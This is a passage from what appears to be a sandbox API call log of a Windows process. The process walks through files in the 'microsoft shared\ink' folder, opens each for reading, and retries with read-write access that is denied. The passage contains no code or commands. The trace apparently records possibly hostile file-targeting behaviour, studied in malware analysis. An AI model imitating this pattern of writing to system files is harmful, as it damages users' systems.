Flags=0x0, Size=0x72) returned 0x6a3b0 [0085.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53718, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 57 [0085.520] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.520] GetLastError () returned 0x5 [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] GetLastError () returned 0x5 [0085.520] SetLastError (dwErrCode=0x5) [0085.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0085.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0085.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.521] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0085.521] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="rtscom.dll", cAlternateFileName="")) returned 1 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e1c8 [0085.521] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.521] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78c50 [0085.522] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e0f5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.522] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3af7a2, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3af7a2, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3af7a2, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x469e8 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0085.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0085.522] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x51590 [0085.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0085.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0085.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51590 | out: hHeap=0x20000) returned 1 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0085.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0085.523] AreFileApisANSI () returned 1 [0085.523] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d898 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0085.523] AreFileApisANSI () returned 1 [0085.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0085.523] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 73 [0085.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x334 [0085.524] GetFileType (hFile=0x334) returned 0x1 [0085.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0085.524] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.524] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.524] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.524] CloseHandle (hObject=0x334) returned 1 [0085.524] AreFileApisANSI () returned 1 [0085.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0085.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85080 [0085.525] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d898, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 73 [0085.525] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.525] GetLastError () returned 0x5 [0085.525] GetLastError () returned 0x5 [0085.525] SetLastError (dwErrCode=0x5) [0085.525] GetLastError () returned 0x5 [0085.525] SetLastError (dwErrCode=0x5) [0085.525] GetLastError () returned 0x5 [0085.525] SetLastError (dwErrCode=0x5) [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d898 | out: hHeap=0x20000) returned 1 [0085.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.525] FindNextFileW (in: hFindFile=0x78c50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x50d00, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⨀")) returned 0 [0085.525] FindClose (in: hFindFile=0x78c50 | out: hFindFile=0x78c50) returned 1 [0085.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0085.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0085.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x469e8 | out: hHeap=0x20000) returned 1 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0085.526] AreFileApisANSI () returned 1 [0085.526] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll", lpUsedDefaultChar=0x0) returned 62 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0085.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0085.527] AreFileApisANSI () returned 1 [0085.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e608 [0085.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 62 [0085.527] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x35c [0085.625] GetFileType (hFile=0x35c) returned 0x1 [0085.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0085.626] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0085.626] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0085.626] SetFilePointerEx (in: hFile=0x35c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0085.626] CloseHandle (hObject=0x35c) returned 1 [0085.626] AreFileApisANSI () returned 1 [0085.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0085.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6ebe0 [0085.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6ebe0, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll") returned 62 [0085.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\rtscom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\rtscom.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0085.627] GetLastError () returned 0x5 [0085.627] GetLastError () returned 0x5 [0085.627] SetLastError (dwErrCode=0x5) [0085.627] GetLastError () returned 0x5 [0085.627] SetLastError (dwErrCode=0x5) [0085.627] GetLastError () returned 0x5 [0085.627] SetLastError (dwErrCode=0x5) [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa080e4d1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3c699c, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0085.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0085.627] AreFileApisANSI () returned 1 [0085.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU", cchWideChar=-1, lpMultiByteStr=0x313f604, 